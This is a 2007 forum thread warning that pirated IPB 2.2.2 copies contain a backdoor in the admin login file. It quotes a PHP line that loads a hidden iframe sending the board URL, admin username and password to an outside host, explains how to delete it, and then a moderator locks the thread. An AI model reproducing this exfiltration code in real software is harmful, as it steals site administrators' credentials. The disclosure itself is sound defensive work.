x10Hosting Forums

Corporate Free Hosting for the Masses.


x10Hosting wishes you a great Year!

Register

Closed Thread
 
LinkBack Thread Tools Display Modes
VIP User

DarkDragonLord's Avatar

Join Date: Mar 2007
Posts: 774
Credits: 7,323
DarkDragonLord has a spectacular aura about
Location: Brazil

Send a message via Skype™ to DarkDragonLord
 
08-20-2007, 05:41 PM
Hack found in IPB 2.2.2 (For those that downloaded it on Internet)

Greetings everyone!

Well, just to let you know. This warning is for everyone but more for those who think is smarter than everyone, not buying the license but just downloading IPB in internet.

But, this can warn other people too.

When you go to www.randomdomainhere.com/forums/admin.php , it send you to forums/admin/index.php right? ok nothing new until here:

When you put your login and password and hit ok, it loads and appear a "Log In Successful".

Ok, but did you noticed that you might be giving your user/pass to anyone? You might ask "how? anyways, its MY forum".

Ya but someone added a code in the php of the admin login xD look this:

http://img251.imageshack.us/img251/5...speito2tw7.jpg

So, when you login, first it give all your info for these bastards, THEN you log in.

I've checked all damn php related to admin of IPB and founded the string. Its inside <forumfolder>/sources/action_admin/login.php

Then, find the array $connector. If you find, take a look and you will see the string giving all your info to the website.

you might find as this:
PHP Code:
$connector '<script>window.stuats=\'\';</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=' htmlentities($this->ipsclass->vars['board_url']) . '&user=' htmlentities($this->ipsclass->input['username']) . '&pass=' htmlentities($this->ipsclass->input['password']) . '\"></div>';
   
$this->ipsclass->admin->redirect$this->ipsclass->vars['board_url'].'/'.IPB_ACP_DIRECTORY."/index.".$this->ipsclass->vars['php_ext']."?ad 
(....) 
Delete all that is related to $connector (all until the div>'; , since the $this in the next line just redirects you to the real admin cp), save and re-upload.

Now when you login, you will notice that your info isnt gave to anyone anymore.

If you check the website that is receiving the info, its offline. But, this is a service LIKE no-ip, so watch yourself.

I founded this while installing and testing a non-official IPB 2.2.2 for my friend since he can't pay the license >.<

Well, that was just a warning to u people: watch yourself and your info. This can be done anywhere in any non-official forum.

Hope this help someone ;D
See you
DDL
__________________
Regards,
Raphael DDL

Designing Solutions for You
*Web Design;
*Coding;
Free Downloads;
and all related Stuff
.


My Tutorials:
| Multi-Language Websites | Rotative Banners |
| Bookmark Script for All Browsers
|
|
PHP Switching/Including Content|
|


Last edited by DarkDragonLord; 08-20-2007 at 05:47 PM. Reason: fixing post
DarkDragonLord is offlineReport Post
x10 Elder

lambada's Avatar

Join Date: Mar 2006
Posts: 1,219
Credits: 7,536
lambada is on a distinguished road
Location: Caister, Gt Yarmouth, Norfolk, ENGLAND

Send a message via AIM to lambada Send a message via MSN to lambada Send a message via Skype™ to lambada
 
08-21-2007, 04:59 PM
Re: Hack found in IPB 2.2.2 (For those that downloaded it on Internet)

That is actually illegal anyway and against the rules of our forum.

On a side note any downloading of an unlicensed IPB to which you do not own the licence is illegal and as such this will be locked.

Consider this a verbal warning: we do not allow discussion of warez (or any matter related to warez) on this forum
__________________
Lambada - the former Account Manager (before I resigned)




Last edited by lambada; 08-21-2007 at 05:00 PM.
lambada is offlineReport Post
Closed Thread

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Similar Threads
Thread Thread Starter Forum Replies Last Post
Internet Download Manager 5.11 build 5 duongtata Computers & Technology 6 09-11-2007 03:19 PM


All times are GMT -5. The time now is 05:37 AM. Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.2.0 RC7
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios